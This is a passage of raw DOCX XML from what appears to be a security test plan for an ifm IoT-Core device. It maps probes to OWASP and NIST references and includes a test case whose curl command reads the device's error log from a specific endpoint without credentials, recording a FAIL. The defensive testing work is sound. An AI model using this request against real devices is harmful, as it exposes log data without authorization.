            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF41A53" w14:textId="3FAB9BE4" w:rsidR="00900880" w:rsidRPr="006D5B99"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Access-control probe: enumerate the IoT-Core for any auth mechanism, role, or purpose-gate on the log endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A2D89C" w14:textId="1720B03C" w:rsidR="00900880" w:rsidRPr="006D5B99"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Proves G-1 (no gate by design)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035CDF9F" w14:textId="54201B33" w:rsidR="00900880" w:rsidRPr="006D5B99"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5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP ISTG-DES-AUTHZ-002;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-004 (ZAP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CFB8F7C" w14:textId="4316216B" w:rsidR="00900880" w:rsidRPr="006D5B99"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900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3B8510" w14:textId="2CDB71D2" w:rsidR="00900880" w:rsidRPr="006D5B99"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Deletion-control probe: attempt any delete/erase of log data; confirm no controlled-deletion command exists (only cold-start wipe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C6C7932" w14:textId="3618BE6B" w:rsidR="00900880" w:rsidRPr="006D5B99"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Proves G-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC3DA8B" w14:textId="77777777" w:rsidR="00964D92"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 xml:space="preserve">NIST SP 800-115 §4.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187270D2" w14:textId="30177A84" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99">
              <w:t>OWASP ISTG-DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795EF34A" w14:textId="17B4222B" w:rsidR="00900880" w:rsidRPr="006D5B99"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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F552779" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021FD117" w14:textId="77777777" w:rsidR="00EC01DE" w:rsidRPr="006D5B99" w:rsidRDefault="00EC01DE" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2F22C8" w14:textId="77777777" w:rsidR="00EC01DE" w:rsidRPr="006D5B99" w:rsidRDefault="00EC01DE" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BAB1F1" w14:textId="3BF40C67" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="00E11113">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8AD24" w14:textId="77777777" w:rsidR="003670E7" w:rsidRPr="006D5B99" w:rsidRDefault="003670E7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EE222D" w14:textId="7D4561AA" w:rsidR="00E575E1" w:rsidRPr="006D5B99" w:rsidRDefault="00E575E1" w:rsidP="00941D2D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ014-01 </w:t>
      </w:r>
      <w:r w:rsidR="00AE2C28" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unauthenticated Tracing-Log Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D3138D" w14:textId="6158E24A" w:rsidR="00941D2D" w:rsidRPr="006D5B99" w:rsidRDefault="00941D2D" w:rsidP="00941D2D">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6D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24848758"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6D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07A180B8" w14:textId="7FA5AC93" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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00BC5E79" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 1.1/1.2 / CR 2.1 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidR="00BC5E79" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3638715D" w14:textId="42F99282" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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Information Disclosure </w:t>
            </w:r>
            <w:r w:rsidR="00BC5E79" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>missing authorization boundary</w:t>
            </w:r>
            <w:r w:rsidR="00BC5E79" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E430FFD" w14:textId="04FF19D0" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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 xml:space="preserve">SVV-4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23884BF8" w14:textId="1CC52EA0" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DF4F28"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From a node with only network access (no credentials, no configuration privilege), request the tracing-log content.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42EC97A9" w14:textId="77777777"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the full log content is returned.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0982F7FA" w14:textId="0CE36295" w:rsidR="00AA5FC5"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authentication challenge, session, or authorization check is presented at any point.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C9BD9E" w14:textId="7ACD19D1" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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no purpose/requestor context is required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3058477D" w14:textId="77777777" w:rsidR="002F5F56"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PASS against the requirement if the log read requires authentication and a purpose-limited authorization. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708110C5" w14:textId="36339700" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Expected FAIL: the log is returned to an unauthenticated arbitrary node with no gate </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the missing access-control gap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58634E2C" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRPr="006D5B99" w:rsidRDefault="00941D2D" w:rsidP="00941D2D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74BAC2A7" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRPr="006D5B99" w:rsidRDefault="00941D2D" w:rsidP="00941D2D">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6D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E74AE29" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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941D2D" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2C2F00" w14:textId="042E2687" w:rsidR="00941D2D" w:rsidRPr="006D5B99"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TC-RQ014-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000839F0" w:rsidRPr="006D5B99"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0839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F0">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="126028B7" w14:textId="145CA5CB" w:rsidR="000839F0" w:rsidRPr="006D5B99" w:rsidRDefault="00806D34" w:rsidP="000839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0839F0" w:rsidRPr="006D5B99"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0839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F0">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554AD54C" w14:textId="41512AE6"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0839F0" w:rsidRPr="006D5B99"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0839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F0">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4001FF17"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export SRIO=192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A3F4F7" w14:textId="0DB28A62"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pt-BR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://$</w:t>
            </w:r>
            <w:r w:rsidR="001104CF">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>SRIO/devicestatus/errorlog/loglist/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F978E0" w14:textId="77777777" w:rsidR="000839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F0">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executed with NO credentials/headers whatsoever; check the response for</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524CF845" w14:textId="189F1EB7" w:rsidR="000839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F0">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t># the full log content.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000839F0" w:rsidRPr="006D5B99"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593A9F90" w:rsidR="000839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F0">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C19ABDE" w14:textId="5EE5ECBF" w:rsidR="000839F0" w:rsidRPr="006D5B99" w:rsidRDefault="000839F0" w:rsidP="000839F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FAIL (against the requirement) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the complete log content is returned without authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="508321EB" w14:textId="34B36740" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="00AE5241">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1189"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442396A0" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7060A8" w14:textId="05154C2F" w:rsidR="00337F04" w:rsidRPr="006D5B99" w:rsidRDefault="00337F04" w:rsidP="00F25477">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27AD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ014-02 - Cleartext Confidentiality of the Tracing Log</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1501F7" w14:textId="65C046FE" w:rsidR="00F25477" w:rsidRPr="006D5B99" w:rsidRDefault="00F25477" w:rsidP="00F25477">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6D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6055F391"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EB5C975" w14:textId="6406A1CC" w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-014 </w:t>
            </w:r>
            <w:r w:rsidR="002F5F56" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 4.1 / CR 4.3 </w:t>
            </w:r>
            <w:r w:rsidR="002F5F56" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">(supporting observation) </w:t>
            </w:r>
            <w:r w:rsidR="002F5F56" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F1AA262" w14:textId="6F48D5C8" w:rsidR="00F25477" w:rsidRPr="006D5B99"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE25833" w14:textId="73EB9CDB" w:rsidR="00F25477" w:rsidRPr="006D5B99"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SVV-3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
